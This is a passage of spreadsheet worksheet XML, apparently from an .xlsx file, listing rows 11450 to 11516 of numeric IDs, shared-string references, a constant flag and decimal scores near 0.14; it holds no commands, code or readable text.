        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11450" ht="15.75" customHeight="1">
      <c r="A11450" s="1">
        <v>30686.0</v>
      </c>
      <c r="B11450" s="2">
        <v>4.2531297E7</v>
      </c>
      <c r="C11450" s="2" t="s">
        <v>10982</v>
      </c>
      <c r="D11450" s="2">
        <v>1.0</v>
      </c>
      <c r="E11450" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11450" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11451" ht="15.75" customHeight="1">
      <c r="A11451" s="1">
        <v>3452.0</v>
      </c>
      <c r="B11451" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C11451" s="2" t="s">
        <v>10983</v>
      </c>
      <c r="D11451" s="2">
        <v>1.0</v>
      </c>
      <c r="E11451" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11451" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11452" ht="15.75" customHeight="1">
      <c r="A11452" s="1">
        <v>4051.0</v>
      </c>
      <c r="B11452" s="2">
        <v>4.1089674E7</v>
      </c>
      <c r="C11452" s="2" t="s">
        <v>10984</v>
      </c>
      <c r="D11452" s="2">
        <v>1.0</v>
      </c>
      <c r="E11452" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11452" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11453" ht="15.75" customHeight="1">
      <c r="A11453" s="1">
        <v>4570.0</v>
      </c>
      <c r="B11453" s="2">
        <v>4.2738542E7</v>
      </c>
      <c r="C11453" s="2" t="s">
        <v>10985</v>
      </c>
      <c r="D11453" s="2">
        <v>1.0</v>
      </c>
      <c r="E11453" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11453" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11454" ht="15.75" customHeight="1">
      <c r="A11454" s="1">
        <v>8859.0</v>
      </c>
      <c r="B11454" s="2">
        <v>5.4730204E7</v>
      </c>
      <c r="C11454" s="5" t="s">
        <v>10986</v>
      </c>
      <c r="D11454" s="2">
        <v>1.0</v>
      </c>
      <c r="E11454" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11454" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11455" ht="15.75" customHeight="1">
      <c r="A11455" s="1">
        <v>12629.0</v>
      </c>
      <c r="B11455" s="2">
        <v>3.0239472E7</v>
      </c>
      <c r="C11455" s="2" t="s">
        <v>10987</v>
      </c>
      <c r="D11455" s="2">
        <v>1.0</v>
      </c>
      <c r="E11455" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11455" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11456" ht="15.75" customHeight="1">
      <c r="A11456" s="1">
        <v>14450.0</v>
      </c>
      <c r="B11456" s="2">
        <v>3.9372555E7</v>
      </c>
      <c r="C11456" s="2" t="s">
        <v>10988</v>
      </c>
      <c r="D11456" s="2">
        <v>1.0</v>
      </c>
      <c r="E11456" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11456" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11457" ht="15.75" customHeight="1">
      <c r="A11457" s="1">
        <v>14504.0</v>
      </c>
      <c r="B11457" s="2">
        <v>3.9695399E7</v>
      </c>
      <c r="C11457" s="2" t="s">
        <v>10989</v>
      </c>
      <c r="D11457" s="2">
        <v>1.0</v>
      </c>
      <c r="E11457" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11457" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11458" ht="15.75" customHeight="1">
      <c r="A11458" s="1">
        <v>17356.0</v>
      </c>
      <c r="B11458" s="2">
        <v>4.9434329E7</v>
      </c>
      <c r="C11458" s="2" t="s">
        <v>10990</v>
      </c>
      <c r="D11458" s="2">
        <v>1.0</v>
      </c>
      <c r="E11458" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11458" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11459" ht="15.75" customHeight="1">
      <c r="A11459" s="1">
        <v>17644.0</v>
      </c>
      <c r="B11459" s="2">
        <v>5.040889E7</v>
      </c>
      <c r="C11459" s="2" t="s">
        <v>10991</v>
      </c>
      <c r="D11459" s="2">
        <v>1.0</v>
      </c>
      <c r="E11459" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11459" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11460" ht="15.75" customHeight="1">
      <c r="A11460" s="1">
        <v>18890.0</v>
      </c>
      <c r="B11460" s="2">
        <v>5.4120604E7</v>
      </c>
      <c r="C11460" s="5" t="s">
        <v>10992</v>
      </c>
      <c r="D11460" s="2">
        <v>1.0</v>
      </c>
      <c r="E11460" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11460" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11461" ht="15.75" customHeight="1">
      <c r="A11461" s="1">
        <v>32587.0</v>
      </c>
      <c r="B11461" s="2">
        <v>5802023.0</v>
      </c>
      <c r="C11461" s="2" t="s">
        <v>10993</v>
      </c>
      <c r="D11461" s="2">
        <v>1.0</v>
      </c>
      <c r="E11461" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11461" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="11462" ht="15.75" customHeight="1">
      <c r="A11462" s="1">
        <v>15843.0</v>
      </c>
      <c r="B11462" s="2">
        <v>4.4401695E7</v>
      </c>
      <c r="C11462" s="2" t="s">
        <v>10994</v>
      </c>
      <c r="D11462" s="2">
        <v>1.0</v>
      </c>
      <c r="E11462" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11462" s="2">
        <v>0.1431924882629108</v>
      </c>
    </row>
    <row r="11463" ht="15.75" customHeight="1">
      <c r="A11463" s="1">
        <v>7234.0</v>
      </c>
      <c r="B11463" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C11463" s="2" t="s">
        <v>10995</v>
      </c>
      <c r="D11463" s="2">
        <v>1.0</v>
      </c>
      <c r="E11463" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11463" s="2">
        <v>0.1427350427350428</v>
      </c>
    </row>
    <row r="11464" ht="15.75" customHeight="1">
      <c r="A11464" s="1">
        <v>6914.0</v>
      </c>
      <c r="B11464" s="2">
        <v>4.9850849E7</v>
      </c>
      <c r="C11464" s="2" t="s">
        <v>10996</v>
      </c>
      <c r="D11464" s="2">
        <v>1.0</v>
      </c>
      <c r="E11464" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11464" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="11465" ht="15.75" customHeight="1">
      <c r="A11465" s="1">
        <v>13586.0</v>
      </c>
      <c r="B11465" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C11465" s="5" t="s">
        <v>10997</v>
      </c>
      <c r="D11465" s="2">
        <v>1.0</v>
      </c>
      <c r="E11465" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11465" s="2">
        <v>0.1425438596491228</v>
      </c>
    </row>
    <row r="11466" ht="15.75" customHeight="1">
      <c r="A11466" s="1">
        <v>6757.0</v>
      </c>
      <c r="B11466" s="2">
        <v>4.9390396E7</v>
      </c>
      <c r="C11466" s="2" t="s">
        <v>10998</v>
      </c>
      <c r="D11466" s="2">
        <v>1.0</v>
      </c>
      <c r="E11466" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11466" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="11467" ht="15.75" customHeight="1">
      <c r="A11467" s="1">
        <v>18583.0</v>
      </c>
      <c r="B11467" s="2">
        <v>5.3249964E7</v>
      </c>
      <c r="C11467" s="2" t="s">
        <v>10999</v>
      </c>
      <c r="D11467" s="2">
        <v>1.0</v>
      </c>
      <c r="E11467" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11467" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="11468" ht="15.75" customHeight="1">
      <c r="A11468" s="1">
        <v>7843.0</v>
      </c>
      <c r="B11468" s="2">
        <v>5.2334225E7</v>
      </c>
      <c r="C11468" s="2" t="s">
        <v>11000</v>
      </c>
      <c r="D11468" s="2">
        <v>1.0</v>
      </c>
      <c r="E11468" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11468" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="11469" ht="15.75" customHeight="1">
      <c r="A11469" s="1">
        <v>16470.0</v>
      </c>
      <c r="B11469" s="2">
        <v>4.6499004E7</v>
      </c>
      <c r="C11469" s="2" t="s">
        <v>11001</v>
      </c>
      <c r="D11469" s="2">
        <v>1.0</v>
      </c>
      <c r="E11469" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11469" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="11470" ht="15.75" customHeight="1">
      <c r="A11470" s="1">
        <v>4647.0</v>
      </c>
      <c r="B11470" s="2">
        <v>4.3077168E7</v>
      </c>
      <c r="C11470" s="2" t="s">
        <v>11002</v>
      </c>
      <c r="D11470" s="2">
        <v>1.0</v>
      </c>
      <c r="E11470" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11470" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="11471" ht="15.75" customHeight="1">
      <c r="A11471" s="1">
        <v>4502.0</v>
      </c>
      <c r="B11471" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C11471" s="2" t="s">
        <v>11003</v>
      </c>
      <c r="D11471" s="2">
        <v>1.0</v>
      </c>
      <c r="E11471" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11471" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="11472" ht="15.75" customHeight="1">
      <c r="A11472" s="1">
        <v>9263.0</v>
      </c>
      <c r="B11472" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C11472" s="2" t="s">
        <v>11004</v>
      </c>
      <c r="D11472" s="2">
        <v>1.0</v>
      </c>
      <c r="E11472" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11472" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="11473" ht="15.75" customHeight="1">
      <c r="A11473" s="1">
        <v>13486.0</v>
      </c>
      <c r="B11473" s="2">
        <v>3.5373518E7</v>
      </c>
      <c r="C11473" s="2" t="s">
        <v>11005</v>
      </c>
      <c r="D11473" s="2">
        <v>1.0</v>
      </c>
      <c r="E11473" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11473" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="11474" ht="15.75" customHeight="1">
      <c r="A11474" s="1">
        <v>18919.0</v>
      </c>
      <c r="B11474" s="2">
        <v>5.4213522E7</v>
      </c>
      <c r="C11474" s="2" t="s">
        <v>11006</v>
      </c>
      <c r="D11474" s="2">
        <v>1.0</v>
      </c>
      <c r="E11474" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11474" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="11475" ht="15.75" customHeight="1">
      <c r="A11475" s="1">
        <v>15600.0</v>
      </c>
      <c r="B11475" s="2">
        <v>4.3478737E7</v>
      </c>
      <c r="C11475" s="2" t="s">
        <v>11007</v>
      </c>
      <c r="D11475" s="2">
        <v>1.0</v>
      </c>
      <c r="E11475" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11475" s="2">
        <v>0.1417910447761194</v>
      </c>
    </row>
    <row r="11476" ht="15.75" customHeight="1">
      <c r="A11476" s="1">
        <v>31906.0</v>
      </c>
      <c r="B11476" s="2">
        <v>5.2971812E7</v>
      </c>
      <c r="C11476" s="2" t="s">
        <v>11008</v>
      </c>
      <c r="D11476" s="2">
        <v>1.0</v>
      </c>
      <c r="E11476" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11476" s="2">
        <v>0.1416275430359938</v>
      </c>
    </row>
    <row r="11477" ht="15.75" customHeight="1">
      <c r="A11477" s="1">
        <v>14424.0</v>
      </c>
      <c r="B11477" s="2">
        <v>3.9256156E7</v>
      </c>
      <c r="C11477" s="2" t="s">
        <v>10988</v>
      </c>
      <c r="D11477" s="2">
        <v>1.0</v>
      </c>
      <c r="E11477" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11477" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="11478" ht="15.75" customHeight="1">
      <c r="A11478" s="1">
        <v>14939.0</v>
      </c>
      <c r="B11478" s="2">
        <v>4.1253364E7</v>
      </c>
      <c r="C11478" s="2" t="s">
        <v>11009</v>
      </c>
      <c r="D11478" s="2">
        <v>1.0</v>
      </c>
      <c r="E11478" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11478" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="11479" ht="15.75" customHeight="1">
      <c r="A11479" s="1">
        <v>19417.0</v>
      </c>
      <c r="B11479" s="2">
        <v>5.5630506E7</v>
      </c>
      <c r="C11479" s="2" t="s">
        <v>11010</v>
      </c>
      <c r="D11479" s="2">
        <v>1.0</v>
      </c>
      <c r="E11479" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11479" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="11480" ht="15.75" customHeight="1">
      <c r="A11480" s="1">
        <v>2828.0</v>
      </c>
      <c r="B11480" s="2">
        <v>3.5395837E7</v>
      </c>
      <c r="C11480" s="2" t="s">
        <v>11011</v>
      </c>
      <c r="D11480" s="2">
        <v>1.0</v>
      </c>
      <c r="E11480" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11480" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="11481" ht="15.75" customHeight="1">
      <c r="A11481" s="1">
        <v>5901.0</v>
      </c>
      <c r="B11481" s="2">
        <v>4.7185003E7</v>
      </c>
      <c r="C11481" s="2" t="s">
        <v>11012</v>
      </c>
      <c r="D11481" s="2">
        <v>1.0</v>
      </c>
      <c r="E11481" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11481" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="11482" ht="15.75" customHeight="1">
      <c r="A11482" s="1">
        <v>17013.0</v>
      </c>
      <c r="B11482" s="2">
        <v>4.8432459E7</v>
      </c>
      <c r="C11482" s="2" t="s">
        <v>11013</v>
      </c>
      <c r="D11482" s="2">
        <v>1.0</v>
      </c>
      <c r="E11482" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11482" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="11483" ht="15.75" customHeight="1">
      <c r="A11483" s="1">
        <v>8375.0</v>
      </c>
      <c r="B11483" s="2">
        <v>5.3811532E7</v>
      </c>
      <c r="C11483" s="2" t="s">
        <v>11014</v>
      </c>
      <c r="D11483" s="2">
        <v>1.0</v>
      </c>
      <c r="E11483" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11483" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="11484" ht="15.75" customHeight="1">
      <c r="A11484" s="1">
        <v>16437.0</v>
      </c>
      <c r="B11484" s="2">
        <v>4.6356378E7</v>
      </c>
      <c r="C11484" s="2" t="s">
        <v>11015</v>
      </c>
      <c r="D11484" s="2">
        <v>1.0</v>
      </c>
      <c r="E11484" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11484" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="11485" ht="15.75" customHeight="1">
      <c r="A11485" s="1">
        <v>17345.0</v>
      </c>
      <c r="B11485" s="2">
        <v>4.9402967E7</v>
      </c>
      <c r="C11485" s="2" t="s">
        <v>11016</v>
      </c>
      <c r="D11485" s="2">
        <v>1.0</v>
      </c>
      <c r="E11485" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11485" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="11486" ht="15.75" customHeight="1">
      <c r="A11486" s="1">
        <v>19484.0</v>
      </c>
      <c r="B11486" s="2">
        <v>5.5857934E7</v>
      </c>
      <c r="C11486" s="2" t="s">
        <v>11017</v>
      </c>
      <c r="D11486" s="2">
        <v>1.0</v>
      </c>
      <c r="E11486" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11486" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="11487" ht="15.75" customHeight="1">
      <c r="A11487" s="1">
        <v>3712.0</v>
      </c>
      <c r="B11487" s="2">
        <v>3.9604165E7</v>
      </c>
      <c r="C11487" s="2" t="s">
        <v>11018</v>
      </c>
      <c r="D11487" s="2">
        <v>1.0</v>
      </c>
      <c r="E11487" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11487" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11488" ht="15.75" customHeight="1">
      <c r="A11488" s="1">
        <v>4693.0</v>
      </c>
      <c r="B11488" s="2">
        <v>4.3231605E7</v>
      </c>
      <c r="C11488" s="2" t="s">
        <v>11019</v>
      </c>
      <c r="D11488" s="2">
        <v>1.0</v>
      </c>
      <c r="E11488" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11488" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11489" ht="15.75" customHeight="1">
      <c r="A11489" s="1">
        <v>5923.0</v>
      </c>
      <c r="B11489" s="2">
        <v>4.722662E7</v>
      </c>
      <c r="C11489" s="2" t="s">
        <v>11020</v>
      </c>
      <c r="D11489" s="2">
        <v>1.0</v>
      </c>
      <c r="E11489" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11489" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11490" ht="15.75" customHeight="1">
      <c r="A11490" s="1">
        <v>6278.0</v>
      </c>
      <c r="B11490" s="2">
        <v>4.8144472E7</v>
      </c>
      <c r="C11490" s="2" t="s">
        <v>11021</v>
      </c>
      <c r="D11490" s="2">
        <v>1.0</v>
      </c>
      <c r="E11490" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11490" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11491" ht="15.75" customHeight="1">
      <c r="A11491" s="1">
        <v>8860.0</v>
      </c>
      <c r="B11491" s="2">
        <v>5.473103E7</v>
      </c>
      <c r="C11491" s="2" t="s">
        <v>11022</v>
      </c>
      <c r="D11491" s="2">
        <v>1.0</v>
      </c>
      <c r="E11491" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11491" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11492" ht="15.75" customHeight="1">
      <c r="A11492" s="1">
        <v>9293.0</v>
      </c>
      <c r="B11492" s="2">
        <v>5.5554655E7</v>
      </c>
      <c r="C11492" s="2" t="s">
        <v>11023</v>
      </c>
      <c r="D11492" s="2">
        <v>1.0</v>
      </c>
      <c r="E11492" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11492" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11493" ht="15.75" customHeight="1">
      <c r="A11493" s="1">
        <v>11677.0</v>
      </c>
      <c r="B11493" s="2">
        <v>2.3432299E7</v>
      </c>
      <c r="C11493" s="2" t="s">
        <v>11024</v>
      </c>
      <c r="D11493" s="2">
        <v>1.0</v>
      </c>
      <c r="E11493" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11493" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11494" ht="15.75" customHeight="1">
      <c r="A11494" s="1">
        <v>13702.0</v>
      </c>
      <c r="B11494" s="2">
        <v>3.6172177E7</v>
      </c>
      <c r="C11494" s="2" t="s">
        <v>11025</v>
      </c>
      <c r="D11494" s="2">
        <v>1.0</v>
      </c>
      <c r="E11494" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11494" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11495" ht="15.75" customHeight="1">
      <c r="A11495" s="1">
        <v>14488.0</v>
      </c>
      <c r="B11495" s="2">
        <v>3.9600941E7</v>
      </c>
      <c r="C11495" s="2" t="s">
        <v>11026</v>
      </c>
      <c r="D11495" s="2">
        <v>1.0</v>
      </c>
      <c r="E11495" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11495" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11496" ht="15.75" customHeight="1">
      <c r="A11496" s="1">
        <v>17400.0</v>
      </c>
      <c r="B11496" s="2">
        <v>4.9632718E7</v>
      </c>
      <c r="C11496" s="2" t="s">
        <v>11027</v>
      </c>
      <c r="D11496" s="2">
        <v>1.0</v>
      </c>
      <c r="E11496" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11496" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11497" ht="15.75" customHeight="1">
      <c r="A11497" s="1">
        <v>19642.0</v>
      </c>
      <c r="B11497" s="2">
        <v>5.6298616E7</v>
      </c>
      <c r="C11497" s="2" t="s">
        <v>11028</v>
      </c>
      <c r="D11497" s="2">
        <v>1.0</v>
      </c>
      <c r="E11497" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11497" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11498" ht="15.75" customHeight="1">
      <c r="A11498" s="1">
        <v>22769.0</v>
      </c>
      <c r="B11498" s="2">
        <v>4.4840715E7</v>
      </c>
      <c r="C11498" s="2" t="s">
        <v>11029</v>
      </c>
      <c r="D11498" s="2">
        <v>1.0</v>
      </c>
      <c r="E11498" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11498" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11499" ht="15.75" customHeight="1">
      <c r="A11499" s="1">
        <v>29424.0</v>
      </c>
      <c r="B11499" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C11499" s="2" t="s">
        <v>11030</v>
      </c>
      <c r="D11499" s="2">
        <v>1.0</v>
      </c>
      <c r="E11499" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11499" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11500" ht="15.75" customHeight="1">
      <c r="A11500" s="1">
        <v>33769.0</v>
      </c>
      <c r="B11500" s="2">
        <v>8670567.0</v>
      </c>
      <c r="C11500" s="2" t="s">
        <v>11031</v>
      </c>
      <c r="D11500" s="2">
        <v>1.0</v>
      </c>
      <c r="E11500" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11500" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="11501" ht="15.75" customHeight="1">
      <c r="A11501" s="1">
        <v>6023.0</v>
      </c>
      <c r="B11501" s="2">
        <v>4.7505943E7</v>
      </c>
      <c r="C11501" s="2" t="s">
        <v>11032</v>
      </c>
      <c r="D11501" s="2">
        <v>1.0</v>
      </c>
      <c r="E11501" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11501" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11502" ht="15.75" customHeight="1">
      <c r="A11502" s="1">
        <v>6777.0</v>
      </c>
      <c r="B11502" s="2">
        <v>4.9449765E7</v>
      </c>
      <c r="C11502" s="2" t="s">
        <v>11033</v>
      </c>
      <c r="D11502" s="2">
        <v>1.0</v>
      </c>
      <c r="E11502" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11502" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11503" ht="15.75" customHeight="1">
      <c r="A11503" s="1">
        <v>14564.0</v>
      </c>
      <c r="B11503" s="2">
        <v>4.0055107E7</v>
      </c>
      <c r="C11503" s="2" t="s">
        <v>11034</v>
      </c>
      <c r="D11503" s="2">
        <v>1.0</v>
      </c>
      <c r="E11503" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11503" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11504" ht="15.75" customHeight="1">
      <c r="A11504" s="1">
        <v>17183.0</v>
      </c>
      <c r="B11504" s="2">
        <v>4.891068E7</v>
      </c>
      <c r="C11504" s="2" t="s">
        <v>11035</v>
      </c>
      <c r="D11504" s="2">
        <v>1.0</v>
      </c>
      <c r="E11504" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11504" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11505" ht="15.75" customHeight="1">
      <c r="A11505" s="1">
        <v>18945.0</v>
      </c>
      <c r="B11505" s="2">
        <v>5.4344522E7</v>
      </c>
      <c r="C11505" s="2" t="s">
        <v>11036</v>
      </c>
      <c r="D11505" s="2">
        <v>1.0</v>
      </c>
      <c r="E11505" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11505" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11506" ht="15.75" customHeight="1">
      <c r="A11506" s="1">
        <v>19041.0</v>
      </c>
      <c r="B11506" s="2">
        <v>5.4568858E7</v>
      </c>
      <c r="C11506" s="2" t="s">
        <v>11037</v>
      </c>
      <c r="D11506" s="2">
        <v>1.0</v>
      </c>
      <c r="E11506" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11506" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11507" ht="15.75" customHeight="1">
      <c r="A11507" s="1">
        <v>23907.0</v>
      </c>
      <c r="B11507" s="2">
        <v>8491302.0</v>
      </c>
      <c r="C11507" s="2" t="s">
        <v>11038</v>
      </c>
      <c r="D11507" s="2">
        <v>1.0</v>
      </c>
      <c r="E11507" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11507" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11508" ht="15.75" customHeight="1">
      <c r="A11508" s="1">
        <v>29831.0</v>
      </c>
      <c r="B11508" s="2">
        <v>3.5394704E7</v>
      </c>
      <c r="C11508" s="2" t="s">
        <v>11039</v>
      </c>
      <c r="D11508" s="2">
        <v>1.0</v>
      </c>
      <c r="E11508" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11508" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11509" ht="15.75" customHeight="1">
      <c r="A11509" s="1">
        <v>30553.0</v>
      </c>
      <c r="B11509" s="2">
        <v>4.0646435E7</v>
      </c>
      <c r="C11509" s="2" t="s">
        <v>11040</v>
      </c>
      <c r="D11509" s="2">
        <v>1.0</v>
      </c>
      <c r="E11509" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11509" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11510" ht="15.75" customHeight="1">
      <c r="A11510" s="1">
        <v>33710.0</v>
      </c>
      <c r="B11510" s="2">
        <v>8491301.0</v>
      </c>
      <c r="C11510" s="2" t="s">
        <v>11041</v>
      </c>
      <c r="D11510" s="2">
        <v>1.0</v>
      </c>
      <c r="E11510" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11510" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="11511" ht="15.75" customHeight="1">
      <c r="A11511" s="1">
        <v>6673.0</v>
      </c>
      <c r="B11511" s="2">
        <v>4.9142765E7</v>
      </c>
      <c r="C11511" s="2" t="s">
        <v>11042</v>
      </c>
      <c r="D11511" s="2">
        <v>1.0</v>
      </c>
      <c r="E11511" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11511" s="2">
        <v>0.1406810035842295</v>
      </c>
    </row>
    <row r="11512" ht="15.75" customHeight="1">
      <c r="A11512" s="1">
        <v>18794.0</v>
      </c>
      <c r="B11512" s="2">
        <v>5.3846413E7</v>
      </c>
      <c r="C11512" s="2" t="s">
        <v>11043</v>
      </c>
      <c r="D11512" s="2">
        <v>1.0</v>
      </c>
      <c r="E11512" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11512" s="2">
        <v>0.1405723905723906</v>
      </c>
    </row>
    <row r="11513" ht="15.75" customHeight="1">
      <c r="A11513" s="1">
        <v>17162.0</v>
      </c>
      <c r="B11513" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C11513" s="2" t="s">
        <v>11044</v>
      </c>
      <c r="D11513" s="2">
        <v>1.0</v>
      </c>
      <c r="E11513" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11513" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="11514" ht="15.75" customHeight="1">
      <c r="A11514" s="1">
        <v>28014.0</v>
      </c>
      <c r="B11514" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C11514" s="2" t="s">
        <v>11045</v>
      </c>
      <c r="D11514" s="2">
        <v>1.0</v>
      </c>
      <c r="E11514" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11514" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="11515" ht="15.75" customHeight="1">
      <c r="A11515" s="1">
        <v>29598.0</v>
      </c>
      <c r="B11515" s="2">
        <v>3.3554951E7</v>
      </c>
      <c r="C11515" s="2" t="s">
        <v>11046</v>
      </c>
      <c r="D11515" s="2">
        <v>1.0</v>
      </c>
      <c r="E11515" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11515" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="11516" ht="15.75" customHeight="1">
      <c r="A11516" s="1">
        <v>34040.0</v>
      </c>
      <c r="B11516" s="2">
        <v>9575296.0</v>
      </c>
      <c r="C11516" s="2" t="s">
        <v>11047</v>
      </c>
      <c r="D11516" s="2">
        <v>1.0</v>
      </c>
      <c r="E11516" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11516" s="2">
